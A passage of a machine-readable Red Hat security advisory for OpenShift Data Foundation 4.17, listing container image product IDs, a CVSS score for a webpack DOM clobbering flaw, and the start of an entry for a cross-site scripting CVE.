"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43796", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:28.106254+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", 